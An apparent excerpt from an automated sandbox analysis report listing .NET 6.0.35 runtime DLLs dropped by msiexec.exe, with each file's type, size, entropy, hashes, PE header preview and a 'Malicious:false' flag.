                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....>F..........." .........0...............................................@......Re....`A........................................p...X............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.557349562243787
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ctZ3ZtIWvhW9NWYnO/VWQ4SWndusxZAqnajT9CMCz4:ctZ3wWvhW9dUds/Al39pCz4
                                                                                                                                                                                                                                                                                                                                  MD5:0A2432A420640A79FAAFF044AB054EF6
                                                                                                                                                                                                                                                                                                                                  SHA1:15688BF3C9330309EC5EA602C0AD5AF1FD68BC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:9DFD114E4182662A669A3B9054DD2A24D96DD66ED96A8B2AC05601928B2084D5
                                                                                                                                                                                                                                                                                                                                  SHA-512:090D6D5046AEFE9006B319FC3F9740426BC93E50CF262CE65857449891CA69D2A235421CFEA3FB178D3F8B1E3F640B8678AA9D8F6E67B8A17985913BEBFB3FDD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@............`A........................................p...x............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.617444368323971
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:UgdKIMFemVWvhWNWYnO/VWQ4mWY1tcQIj21EhqnajKsxN:JH0WvhWdUDIqslGsxN
                                                                                                                                                                                                                                                                                                                                  MD5:E1A7B1F8CDB24324D0E44B0078DB8BD1
                                                                                                                                                                                                                                                                                                                                  SHA1:B6C2FE32AE5FA1398F7AE6245C405378E32A7897
                                                                                                                                                                                                                                                                                                                                  SHA-256:45D4F1E398E4CC73FD1AAAD80219D2A9D3205A228167C819EB6787D7B01FC186
                                                                                                                                                                                                                                                                                                                                  SHA-512:144AFE1CB812DE93FBDD08658AFEB4C95480A8E504C5DCF909FF226400CA2D0F48395CF71954FBD1B3DD93A49CBA39EC0DB3FC34A05804C93FD9A48B0A1749CA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......d.........." .........0...............................................@.......A....`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.549935038939539
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+cWvhWoWYnO/VWQ4mWRhXEKup3JdqnajKsztzy:+cWvhWWUqX7aJdlGsztzy
                                                                                                                                                                                                                                                                                                                                  MD5:CB39EEA2EF9ED3674C597D5F0667B5B4
                                                                                                                                                                                                                                                                                                                                  SHA1:C133DC6416B3346FA5B0F449D7CC6F7DBF580432
                                                                                                                                                                                                                                                                                                                                  SHA-256:1627B921934053F1F7D2A19948AEE06FAC5DB8EE8D4182E6F071718D0681F235
                                                                                                                                                                                                                                                                                                                                  SHA-512:2C65014DC045A2C1E5F52F3FEA4967D2169E4A78D41FE56617CE9A4D5B30EBF25043112917FF3D7D152744DDEF70475937AE0A7F96785F97DCEFAFE8E6F14D9C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................" .........0...............................................@............`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.319450964936577
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:MPWvhWRWYnO/VWQ4SWiIsxZAqnajT9CDH:yWvhWRUCs/Al39OH
                                                                                                                                                                                                                                                                                                                                  MD5:5B6C46F42ED6800C54EEB9D12156CE1F
                                                                                                                                                                                                                                                                                                                                  SHA1:66CE7A59B82702875D3E7F5B7CF8054D75FF495F
                                                                                                                                                                                                                                                                                                                                  SHA-256:2631CADCE7F97B9A9E6DF4E88F00F5A43EF73B070EE024ED71F0B447A387FF2F
                                                                                                                                                                                                                                                                                                                                  SHA-512:38FF6745BB5597A871B67AA53FCC8426BC2CDD16B6497A0EB7B59C21D8716F1ABB1F7C7A40A121AD1BD67B5490FEF5CF82EE8FD0BF848F27DCA27FC5D25DEC61
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......#.........." .........0...............................................@...........`A........................................p...<............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6478341719136145
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:y0WvhW3WYnO/VWQ4mW8iTH2vArqnajKsbTYk:FWvhWnUIH24rlGsbTYk
                                                                                                                                                                                                                                                                                                                                  MD5:A68D15CAB300774D2A20A986EE57F9F4
                                                                                                                                                                                                                                                                                                                                  SHA1:BB69665B3C8714D935EE63791181491B819795CB
                                                                                                                                                                                                                                                                                                                                  SHA-256:966DDBF59E1D6C2A80B8ABBF4A30D37475DE097BF13FB72BA78684D65975CD97
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC040F92560631CA5162C7559173BDFE858E282225967AB1ADC0A038D34943B00DB140D44319CD2CDC2864295A098AB0BA634DFAA443E1D1782FA143AE4C217D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...8.?;.........." .........0...............................................@......5.....`A........................................P................0...............0...!..............p............................................................................rdata..@...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.647238720605179
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:3jQ/w8u4cy1WvhWb9WYnO/VWQ4SWANsAlosytkqnaj6Md:fy1WvhWhUNsilWMd
                                                                                                                                                                                                                                                                                                                                  MD5:0E35E369165875D3A593D68324E2B162
                                                                                                                                                                                                                                                                                                                                  SHA1:6A1FF3405277250A892B79FAED01DCDC9DBF864A
                                                                                                                                                                                                                                                                                                                                  SHA-256:14694879F9C3C52FBD7DDE96BF5D67B9768B067C80D5567BE55B37262E9DBD54
                                                                                                                                                                                                                                                                                                                                  SHA-512:D496F0C38300D0EED62B26A59C57463A1444A0C77A75C463014C5791371DECA93D1D5DD0090E8E324C6A09BD9CFF328F94947272CA49018C191C12732E805EE8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....A............" .........@...............................................P......4.....`A........................................P................@...............@...!..............p............................................................................rdata..>........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.454858890873412
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:PLGju+OXWvhW+eWYnO/VWQ4mWPiNbj21EhqnajKsxy:PLGjuJWvhWFUztqslGsxy
                                                                                                                                                                                                                                                                                                                                  MD5:DACF383A06480CA5AB70D7156AECAB43
                                                                                                                                                                                                                                                                                                                                  SHA1:9E48D096C2E81A7D979F3C6B94315671157206A1
                                                                                                                                                                                                                                                                                                                                  SHA-256:00F84C438AAB40500A2F2DF22C7A4EC147A50509C8D0CDAC6A83E4269E387478
                                                                                                                                                                                                                                                                                                                                  SHA-512:5D4146A669DDB963CF677257EC7865E2CFCB7960E41A38BBD60F9A7017474ED2F3291505FA407E25881CBF9E5E6B8055FF3BD891043284A0A04E3FE9CFAD9817
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................." .........0...............................................@......w.....`A........................................P..."............0...............0...!..............p............................................................................rdata..r...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.950541424159939
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:RSnWlC0i5CtWvhWJKWYnO/VWQ4SWuMasxZAqnajT9CQMDt:RSnWm5CtWvhWWUyas/Al39ODt
                                                                                                                                                                                                                                                                                                                                  MD5:D725D87A331E3073BF289D4EC85BD04D
                                                                                                                                                                                                                                                                                                                                  SHA1:C9D36103BE794A802957D0A8243B066FA22F2E43
                                                                                                                                                                                                                                                                                                                                  SHA-256:30BCF934CBCC9ED72FF364B6E352A70A9E2AFA46ECEADEA5C47183CB46CFD16E
                                                                                                                                                                                                                                                                                                                                  SHA-512:6713FF954221C5DD835C15556E5FA6B8684FA7E19CE4F527A5892E77F322B3DAE7199A232040B89AD4A9575C8D9788D771892D2294F3C18DA45E643EB25FDB08
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......0.........." .........0...............................................@............`A........................................P................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.591111522505104
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:PUFY17aFBRIWvhWrWYnO/VWQ4mWCJH2vArqnajKsbTYxj:8Q1WvhWLUrH24rlGsbTY5
                                                                                                                                                                                                                                                                                                                                  MD5:9151E83B4FDFA88353B7A97AE7792678
                                                                                                                                                                                                                                                                                                                                  SHA1:B46152E70D5D3D75D61D4CCDB50403BD08BB9354
                                                                                                                                                                                                                                                                                                                                  SHA-256:6C0E0D22B65329F4948FCF36C8048A54CCCCBF6C05B330B2C1A686F3E686EED0
                                                                                                                                                                                                                                                                                                                                  SHA-512:4D4210474957E656D821E1DC5934A4BFBF7E73DD61D696A1AB39914F887810C8FBE500DBB1E23782B40807F25820F35C9665E04DCDC2FD0F6C83046A4AECB86B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...G..d.........." .........0...............................................@............`A........................................P................0...............0...!..............p............................................................................rdata..f...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.54281367075804
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:g8yWvhWVWYnO/VWQ4mWWeUDj21EhqnajKsxRIM9:gtWvhWFUtDqslGsxRIG
                                                                                                                                                                                                                                                                                                                                  MD5:EBC168D7D3EA7C6192935359B6327627
                                                                                                                                                                                                                                                                                                                                  SHA1:AECEB7C071CF1BB000758B6CEEBEFEEC91AD22BD
                                                                                                                                                                                                                                                                                                                                  SHA-256:C048A3D7AB951DCE1D6D3F5F497B50353F640A1787C6C65677A13C55C8E99983
                                                                                                                                                                                                                                                                                                                                  SHA-512:891D252ECD50BDED4614547758D5E301BDF8E71FBB1023FF89F8DE2F81927CC7CC84B98985D99E8FA8DCBF361E5117D9C625DC0D36983AFC3F2AA48A54CE3D48
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....h\..........." .........0...............................................@......}.....`A........................................P...e............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.946641263598223
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MQM4Oe59Ckb1hgmLJWvhWdUN8HOhlxAnY:rMq59Bb1jeanOunY
                                                                                                                                                                                                                                                                                                                                  MD5:7A235962DBAB1E807C6EC7609FC76077
                                                                                                                                                                                                                                                                                                                                  SHA1:148DDD11A0D366313F75871007057B3F0485AB33
                                                                                                                                                                                                                                                                                                                                  SHA-256:F7C5D7394643C95FE14C07773A8A206E74A28DB125F9B3976F9E1C8C599F2AF1
                                                                                                                                                                                                                                                                                                                                  SHA-512:25B21EE7BB333E5E34D2B4A32D631A50B8FFAF1F1320D47C97C2A4DFF59FA2A2703CDF30638B46C800D3150EFAA4A2518C55E7B2A3B2E4273F43DD5CA83AE940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...J..R.........." .........P...............................................`............`A........................................P....%...........P...............P...!..............p............................................................................rdata...&.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.764408242494898
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:VA/kPLPmIHJI6/CpG3t2G3t4odXLJWvhWSUwlmX7aJdlGszti:y/kjPmIHJI6AFc7aJGT
                                                                                                                                                                                                                                                                                                                                  MD5:B3B4A0F3FCE120318E71DE3AFB6BB1AA
                                                                                                                                                                                                                                                                                                                                  SHA1:D3349409EC717F942769BA67FECA40557C1423D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:A38E6786DC8EC6D2717343DBE00BB2FDDA008D87935BBD9371AE94E7E004270B
                                                                                                                                                                                                                                                                                                                                  SHA-512:4A130674DDBB05949665F6F7A070B25E82C34047D1E62EC60C73F815CED39A9041D972BE4E8C505F9B13C5BCDC114F3479BF8D69D7D9CF9987D39A6F5DB7F560
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....T............" .........P...............................................`............`A........................................P.... ...........P...............P...!..............p............................................................................rdata..D".......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-private-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):74192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1227875842071615
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:LLraHgDe5c4bFe2JyhcvxXWpD7d3334BkZnjPgB/P5W:baHgDe5c4bFe2JyhcvxXWpD7d3334Bkb
                                                                                                                                                                                                                                                                                                                                  MD5:7033AB91EA4F0593E4D6009D549E560F
                                                                                                                                                                                                                                                                                                                                  SHA1:4951CE111CA56994D007A9714A78CDADEEB0DACF
                                                                                                                                                                                                                                                                                                                                  SHA-256:BE7901AA1FACEA8E1FD74A62BDE54CC3BD8E898B52E76FABB70342B160989B80
                                                                                                                                                                                                                                                                                                                                  SHA-512:8BC3B880E31EBE3BC438A24D2AF249C95E320AC3C7A501027EF634F55AAB6FAC4F6D1090A00C29A44657A34EBADCD62023F2E947D31C192072698B645F8651ED
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....+..........." ................................................................e.....`A........................................P....................................!..............p............................................................................rdata..............................@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.608840616484201
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:4adyqjd7VWvhWpWYnO/VWQ4mWB8nXEKup3JdqnajKszt0CkD:4aQ0WvhWpUnX7aJdlGszt0r
                                                                                                                                                                                                                                                                                                                                  MD5:55463244172161B76546DC2DE37F42BD
                                                                                                                                                                                                                                                                                                                                  SHA1:C10A5360AD5E340D59C814E159EA1EFCBF5BF3EE
                                                                                                                                                                                                                                                                                                                                  SHA-256:4166A32551989F960DAC7C0E296FFB28092F45F6539E7C450FA04BF17612BE73
                                                                                                                                                                                                                                                                                                                                  SHA-512:EACEC78FF95F60DEF6F7F27BDA4A84F1DD2DFA386EFC4F6DA770C37268DF83C5B402693EA5C29F54D48026579F3843DB26ADD4D6448EA10CBF7F14D4D14A72FD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....w>..........." .........0...............................................@......M.....`A........................................P...x............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.795732177662406
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:oHUW9MPrpJhhf4AN5/KiZWvhWMWYnO/VWQ4mWLz8Y5H2vArqnajKsbTYCkI:oHUZr7PWvhW6UeH24rlGsbTYCx
                                                                                                                                                                                                                                                                                                                                  MD5:27C4A3BCC0F1DBA2DE4C2242CD489F3B
                                                                                                                                                                                                                                                                                                                                  SHA1:A704FD91E3C67108B1F02FD5E9F1223C7154A9CC
                                                                                                                                                                                                                                                                                                                                  SHA-256:315DED39D9E157CEC05D83711C09858C23602857C9D8C88BEEF121C24C43BE84
                                                                                                                                                                                                                                                                                                                                  SHA-512:793E74DFB1052C06AB4C29E7B622C795CC3122A722382B103940B94E9DAC1E6CA8039DF48C558EFCC5D952A0660393AE2B11CED5ADE4DC8D5DD31A9F5BB9F807
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...4{.+.........." .........@...............................................P............`A........................................P...4............@...............@...!..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.082770273323341
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
